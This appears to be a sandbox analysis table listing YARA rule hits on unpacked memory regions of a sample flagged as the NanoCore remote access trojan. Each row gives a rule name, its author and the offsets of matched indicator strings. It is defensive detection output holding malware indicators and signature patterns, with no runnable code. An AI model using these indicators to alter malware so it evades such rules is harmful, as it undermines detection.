5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0xb165:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin 0xb158:$s1: ClientPlugin 0x10179:$s6: get_ClientSettings
5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x350b:$a1: NanoCore.ClientPluginHost 0x34e2:$a2: NanoCore.ClientPlugin 0x5854:$b7: LogClientException 0x34f8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x34e2:$x2: NanoCore.ClientPlugin 0x350b:$x3: NanoCore.ClientPluginHost 0x34d3:$i3: IClientNetwork 0x34f8:$i6: IClientLoggingHost 0x3525:$i7: IClientNetworkHost 0x334e:$s1: ClientPlugin 0x34eb:$s1: ClientPlugin
12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0x145e3:$a1: NanoCore.ClientPluginHost 0x2d5c7:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x145ae:$a2: NanoCore.ClientPlugin 0x2d592:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0x19529:$b1: get_BuilderSettings 0x3250d:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x19498:$b7: LogClientException 0x3247c:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost 0x145fd:$b9: IClientLoggingHost 0x2d5e1:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d57d:$a: NanoCore 0x2d592:$a: NanoCore 0x2d5c7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d339:$b: ClientPlugin 0x2d354:$b: ClientPlugin
12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5c7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d5f4:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x145ae:$x2: NanoCore.ClientPlugin 0x2d592:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x145e3:$x3: NanoCore.ClientPluginHost 0x2d5c7:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0x145a2:$i2: IClientData 0x2d586:$i2: IClientData 0xe29:$i3: IClientNetwork 0x145c4:$i3: IClientNetwork 0x2d5a8:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0x145d3:$i5: IClientDataHost 0x2d5b7:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0x145fd:$i6: IClientLoggingHost 0x2d5e1:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7860000.18.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3f0b:$a1: NanoCore.ClientPluginHost 0x3f87:$a2: NanoCore.ClientPlugin 0x4b10:$b7: LogClientException 0x3f25:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7860000.18.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3f0b:$x1: NanoCore.ClientPluginHost 0x3f44:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7860000.18.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3f87:$x2: NanoCore.ClientPlugin 0x3f0b:$x3: NanoCore.ClientPluginHost 0x3f9d:$i3: IClientNetwork 0x3f25:$i6: IClientLoggingHost 0x3f44:$i7: IClientNetworkHost 0x3bfb:$s1: ClientPlugin 0x3f90:$s1: ClientPlugin 0x50f4:$s3: IPAddress
5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f1db:$a1: NanoCore.ClientPluginHost 0x1f1b2:$a2: NanoCore.ClientPlugin 0x24206:$b7: LogClientException 0x1f1c8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1f1b2:$x2: NanoCore.ClientPlugin 0x1f1db:$x3: NanoCore.ClientPluginHost 0x1f1a3:$i3: IClientNetwork 0x1f1c8:$i6: IClientLoggingHost 0x1f1f5:$i7: IClientNetworkHost 0x1f208:$i8: IClientUIHost 0x1ef12:$s1: ClientPlugin 0x1f1bb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10937:$a1: NanoCore.ClientPluginHost 0x1090e:$a2: NanoCore.ClientPlugin 0x15962:$b7: LogClientException 0x10924:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7890000.21.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3deb:$a1: NanoCore.ClientPluginHost 0x3ed5:$a2: NanoCore.ClientPlugin 0x572e:$b7: LogClientException 0x4d41:$b8: PipeExists 0x3e05:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1090e:$x2: NanoCore.ClientPlugin 0x10937:$x3: NanoCore.ClientPluginHost 0x108ff:$i3: IClientNetwork 0x10924:$i6: IClientLoggingHost 0x10951:$i7: IClientNetworkHost 0x10964:$i8: IClientUIHost 0x1066e:$s1: ClientPlugin 0x10917:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7890000.21.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7890000.21.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3ed5:$x2: NanoCore.ClientPlugin 0x3deb:$x3: NanoCore.ClientPluginHost 0x3eeb:$i3: IClientNetwork 0x3e24:$i5: IClientDataHost 0x3e05:$i6: IClientLoggingHost 0x3f48:$i7: IClientNetworkHost 0x3e43:$i8: IClientUIHost 0x4d55:$i9: IClientNameObjectCollection 0x38fc:$s1: ClientPlugin 0x3ede:$s1: ClientPlugin 0x4d71:$s6: get_ClientSettings
5.2.nD2ozRD7MN.exe.76e0000.16.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6da5:$a1: NanoCore.ClientPluginHost 0x6d7f:$a2: NanoCore.ClientPlugin 0x6dbf:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.76e0000.16.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.76e0000.16.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x6d7f:$x2: NanoCore.ClientPlugin 0x6da5:$x3: NanoCore.ClientPluginHost 0x6d70:$i3: IClientNetwork 0x6d95:$i5: IClientDataHost 0x6dbf:$i6: IClientLoggingHost 0x6dd2:$i7: IClientNetworkHost 0x6de5:$i9: IClientNameObjectCollection 0x6b02:$s1: ClientPlugin 0x6d88:$s1: ClientPlugin
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xe0f5:$v1: NanoCore Client 0xe105:$v1: NanoCore Client 0xf9c6:$v2: PluginCommand 0xf9ae:$v3: CommandType
9.2.nD2ozRD7MN.exe.41295d0.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f1db:$a1: NanoCore.ClientPluginHost 0x1f1b2:$a2: NanoCore.ClientPlugin 0x24206:$b7: LogClientException 0x1f1c8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1f1b2:$x2: NanoCore.ClientPlugin 0x1f1db:$x3: NanoCore.ClientPluginHost 0x1f1a3:$i3: IClientNetwork 0x1f1c8:$i6: IClientLoggingHost 0x1f1f5:$i7: IClientNetworkHost 0x1f208:$i8: IClientUIHost 0x1ef12:$s1: ClientPlugin 0x1f1bb:$s1: ClientPlugin
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x42bad:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x42b6d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0x44ac6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x429c9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x441e6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x42b9e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x4d01e:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x4511e:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x48e11:$b7: LogClientException 0x1266b:$b8: PipeExists 0x4508b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42915:$a: NanoCore 0x42925:$a: NanoCore 0x42b59:$a: NanoCore 0x42b6d:$a: NanoCore 0x42bad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42974:$b: ClientPlugin 0x42b76:$b: ClientPlugin 0x42bb6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42a9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x434a2:$d: DESCrypto 0x1844e:$e: KeepAlive
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42bad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42bea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4671d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfef5:$v1: NanoCore Client 0xff05:$v1: NanoCore Client 0x42915:$v1: NanoCore Client 0x42925:$v1: NanoCore Client 0x117c6:$v2: PluginCommand 0x441e6:$v2: PluginCommand 0x117ae:$v3: CommandType 0x441ce:$v3: CommandType
0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x42915:$x1: NanoCore Client 0x42925:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x42b6d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x42bad:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x42b62:$i1: IClientApp 0x10163:$i2: IClientData 0x42b83:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x42b8f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x42b9e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x42bc7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x42bd7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x42bad:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x42b6d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0x44ac6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x429c9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x441e6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x42b9e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x4d01e:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x4511e:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x48e11:$b7: LogClientException 0x1266b:$b8: PipeExists 0x4508b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42915:$a: NanoCore 0x42925:$a: NanoCore 0x42b59:$a: NanoCore 0x42b6d:$a: NanoCore 0x42bad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42974:$b: ClientPlugin 0x42b76:$b: ClientPlugin 0x42bb6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42a9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x434a2:$d: DESCrypto 0x1844e:$e: KeepAlive
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42bad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42bea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4671d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfef5:$v1: NanoCore Client 0xff05:$v1: NanoCore Client 0x42915:$v1: NanoCore Client 0x42925:$v1: NanoCore Client 0x117c6:$v2: PluginCommand 0x441e6:$v2: PluginCommand 0x117ae:$v3: CommandType 0x441ce:$v3: CommandType
9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x42915:$x1: NanoCore Client 0x42925:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x42b6d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x42bad:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x42b62:$i1: IClientApp 0x10163:$i2: IClientData 0x42b83:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x42b8f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x42b9e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x42bc7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x42bd7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost
5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b99:$a1: NanoCore.ClientPluginHost 0x1193b:$a1: NanoCore.ClientPluginHost 0x3683f:$a1: NanoCore.ClientPluginHost 0x45c7f:$a1: NanoCore.ClientPluginHost 0x5b70:$a2: NanoCore.ClientPlugin 0x11912:$a2: NanoCore.ClientPlugin 0x36816:$a2: NanoCore.ClientPlugin 0x45c5a:$a2: NanoCore.ClientPlugin 0x45c70:$b4: IClientAppHost 0x13c84:$b7: LogClientException 0x3b86a:$b7: LogClientException 0x4a15f:$b7: LogClientException 0x5b86:$b9: IClientLoggingHost 0x11928:$b9: IClientLoggingHost 0x3682c:$b9: IClientLoggingHost 0x45ca9:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0xb537:$a1: NanoCore.ClientPluginHost 0x12608:$a1: NanoCore.ClientPluginHost 0x18895:$a1: NanoCore.ClientPluginHost 0x22ea7:$a1: NanoCore.ClientPluginHost 0x2d2d7:$a1: NanoCore.ClientPluginHost 0x382bd:$a1: NanoCore.ClientPluginHost 0x44067:$a1: NanoCore.ClientPluginHost 0x4fdb2:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0xb5b3:$a2: NanoCore.ClientPlugin 0x12652:$a2: NanoCore.ClientPlugin 0x1890f:$a2: NanoCore.ClientPlugin 0x22f91:$a2: NanoCore.ClientPlugin 0x2d377:$a2: NanoCore.ClientPlugin 0x38294:$a2: NanoCore.ClientPlugin 0x4403e:$a2: NanoCore.ClientPlugin 0x4fd8d:$a2: NanoCore.ClientPlugin 0x4fda3:$b4: IClientAppHost 0xc13c:$b7: LogClientException 0x19030:$b7: LogClientException
5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x14de1:$a1: NanoCore.ClientPluginHost 0x21f4f:$a1: NanoCore.ClientPluginHost 0x2bda3:$a1: NanoCore.ClientPluginHost 0x32e74:$a1: NanoCore.ClientPluginHost 0x39101:$a1: NanoCore.ClientPluginHost 0x43713:$a1: NanoCore.ClientPluginHost 0x4db43:$a1: NanoCore.ClientPluginHost 0x58b29:$a1: NanoCore.ClientPluginHost 0x648d3:$a1: NanoCore.ClientPluginHost 0x7061e:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x14dbb:$a2: NanoCore.ClientPlugin 0x21fcb:$a2: NanoCore.ClientPlugin 0x2be1f:$a2: NanoCore.ClientPlugin 0x32ebe:$a2: NanoCore.ClientPlugin 0x3917b:$a2: NanoCore.ClientPlugin 0x437fd:$a2: NanoCore.ClientPlugin 0x4dbe3:$a2: NanoCore.ClientPlugin 0x58b00:$a2: NanoCore.ClientPlugin 0x648aa:$a2: NanoCore.ClientPlugin
5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dbb:$a: NanoCore 0x14de1:$a: NanoCore 0x14e3d:$a: NanoCore 0x21c97:$a: NanoCore 0x21cf0:$a: NanoCore 0x21d23:$a: NanoCore 0x21f4f:$a: NanoCore 0x21fcb:$a: NanoCore 0x225e4:$a: NanoCore 0x2272d:$a: NanoCore 0x22c01:$a: NanoCore 0x22ee8:$a: NanoCore 0x22eff:$a: NanoCore 0x2bda3:$a: NanoCore 0x2be1f:$a: NanoCore 0x2e702:$a: NanoCore 0x32e74:$a: NanoCore 0x32ebe:$a: NanoCore
5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14de1:$x1: NanoCore.ClientPluginHost 0x21f4f:$x1: NanoCore.ClientPluginHost 0x2bda3:$x1: NanoCore.ClientPluginHost 0x32e74:$x1: NanoCore.ClientPluginHost 0x39101:$x1: NanoCore.ClientPluginHost 0x43713:$x1: NanoCore.ClientPluginHost 0x4db43:$x1: NanoCore.ClientPluginHost 0x58b29:$x1: NanoCore.ClientPluginHost 0x648d3:$x1: NanoCore.ClientPluginHost 0x7061e:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e0e:$x2: IClientNetworkHost 0x21f88:$x2: IClientNetworkHost 0x2bddc:$x2: IClientNetworkHost 0x3913a:$x2: IClientNetworkHost 0x43870:$x2: IClientNetworkHost 0x4db7c:$x2: IClientNetworkHost 0x58b43:$x2: IClientNetworkHost 0x648ed:$x2: IClientNetworkHost 0x7065b:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x14dbb:$x2: NanoCore.ClientPlugin 0x21fcb:$x2: NanoCore.ClientPlugin 0x2be1f:$x2: NanoCore.ClientPlugin 0x32ebe:$x2: NanoCore.ClientPlugin 0x3917b:$x2: NanoCore.ClientPlugin 0x437fd:$x2: NanoCore.ClientPlugin 0x4dbe3:$x2: NanoCore.ClientPlugin 0x58b00:$x2: NanoCore.ClientPlugin 0x648aa:$x2: NanoCore.ClientPlugin 0x705f9:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x14de1:$x3: NanoCore.ClientPluginHost 0x21f4f:$x3: NanoCore.ClientPluginHost 0x2bda3:$x3: NanoCore.ClientPluginHost 0x32e74:$x3: NanoCore.ClientPluginHost 0x39101:$x3: NanoCore.ClientPluginHost 0x43713:$x3: NanoCore.ClientPluginHost 0x4db43:$x3: NanoCore.ClientPluginHost 0x58b29:$x3: NanoCore.ClientPluginHost 0x648d3:$x3: NanoCore.ClientPluginHost
5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x1193b:$x1: NanoCore.ClientPluginHost 0x3683f:$x1: NanoCore.ClientPluginHost 0x45c7f:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost 0x11955:$x2: IClientNetworkHost 0x36859:$x2: IClientNetworkHost 0x45cbc:$x2: IClientNetworkHost
